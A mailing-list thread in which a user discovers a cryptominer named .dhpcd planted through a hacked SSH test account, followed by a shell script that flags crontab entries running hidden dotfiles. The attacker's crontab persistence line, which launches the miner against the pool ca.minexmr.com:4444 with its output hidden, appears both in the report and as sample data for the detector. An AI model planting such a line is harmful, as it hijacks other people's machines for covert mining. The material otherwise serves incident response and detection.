The problem occurred when someone hacked ssh to log in as my test user. They installed an executable file .dhcpd and started it in crontab. I killed the app and cleared the executable bits. I then removed the crontab line.

2 * * * * /home/test/.dhpcd -o ca.minexmr.com:4444 -B >/dev/null 2>/dev/null

On 2021-03-02 9:17 a.m., James Knott wrote:
Today, I noticed my computer performance was very poor. Top showed something called .dhcpd running under user test and using almost 400% of my CPU. In ~/test, I found an executable .dhcpd. I have not used the test account for a long time. That .dhcpd also survived a reboot, so I'll have to determine how it's starting.
Here is some info:
linux:~ # ps aux|grep test
test      3887  0.0  0.0   72236    7956 ?      Ss   09:02   0:00 /usr/lib/systemd/systemd --user
test      3888  0.0  0.0  265004    3220 ?      S    09:02   0:00 (sd-pam)
test      3909  416  7.3 2439200 2401880 ?      SNsl 09:02   5:35 /home/test/.dhpcd
root      5532  0.0  0.0    7432     920 pts/2  S+   09:03   0:00 grep --color=auto test
linux:~ # cd ~test
linux:/home/test # ls
.Xauthority    .config  .emacs     .gtkrc-2.0  .local    .profile       .xinitrc.template    Downloads  Templates
.bash_history  .dbus    .esd_auth  .i18n       .mozilla  .qt            .xsession-errors-:1  Music      Videos
.bashrc        .dhpcd   .fonts     .inputrc    .nx       .ssh           Desktop              Pictures   bin
.cache         .dmrc    .gnupg     .kde4       .pki      .xim.template  Documents            Public     public_html
linux:/home/test # ls -l .dhpcd
-rwxr-xr-x 1 test users 3458848 Mar 1 18:38 .dhpcd
linux:/home/test # kill -9 3909
linux:/home/test # ps aux|grep test
root      7884  0.0  0.0    7432     820 pts/2  S+   09:06   0:00 grep --color=auto test
linux:/home/test # more .dhpcd
******** .dhpcd: Not a text file ********
linux:/home/test # ls -a .dhpcd
.dhpcd
linux:/home/test # ls -al .dhpcd
-rwxr-xr-x 1 test users 3458848 Mar 1 18:38 .dhpcd
linux:/home/test #
There were some updates yesterday, so I wonder if one of them is infected with something. Also, this computer is configured with a static IPv4 address and uses SLAAC on IPv6, so it shouldn't be using dhcpd.
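The persistence mechanism found in this thread (a user crontab entry launching a hidden dotfile executable dropped straight into a home directory) is easy to audit for. The script below is an added example, not part of the thread or anyone's posted code; the crontab text it scans is constructed sample data, with one line modelled on the entry quoted above.

```shell
#!/bin/sh
# Added example: flag crontab entries whose program is a hidden dotfile
# directly under /home/<user>, the pattern seen in the thread above.

# Constructed sample crontab: a benign job, the miner-style entry, and a
# dotfile in a subdirectory (which is not flagged by the rule below).
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/bin/backup-home.sh
2 * * * * /home/test/.dhpcd -o ca.minexmr.com:4444 -B >/dev/null 2>/dev/null
@reboot /home/test/.config/autostart.sh'

# Read crontab text on stdin, print the command part of every suspicious
# line, and return 0 if at least one was found (1 otherwise).
find_hidden_home_jobs() {
    awk '
        /^[[:space:]]*(#|$)/ { next }          # skip comments and blank lines
        {
            if ($1 ~ /^@/) { cmd_start = 2 }   # @reboot, @hourly, ... form
            else           { cmd_start = 6 }   # five time fields, then command
            prog = $cmd_start
            # program is a dotfile sitting directly inside a home directory
            if (prog ~ /^\/home\/[^\/]+\/\.[^\/]+$/) {
                found = 1
                for (i = cmd_start; i <= NF; i++)
                    printf "%s%s", $i, (i < NF ? " " : "\n")
            }
        }
        END { exit found ? 0 : 1 }'
}

# Number of suspicious entries in the constructed sample.
count_sample_hits() {
    printf '%s\n' "$SAMPLE_CRONTAB" | find_hidden_home_jobs | wc -l | tr -d ' '
}

# Live audit of every account's crontab (run as root; not executed here):
#   for u in $(cut -d: -f1 /etc/passwd); do
#       crontab -l -u "$u" 2>/dev/null | find_hidden_home_jobs
#   done
```

The rule is deliberately narrow (a dotfile directly under a home directory); widen the pattern if your environment also stages payloads under dot-directories.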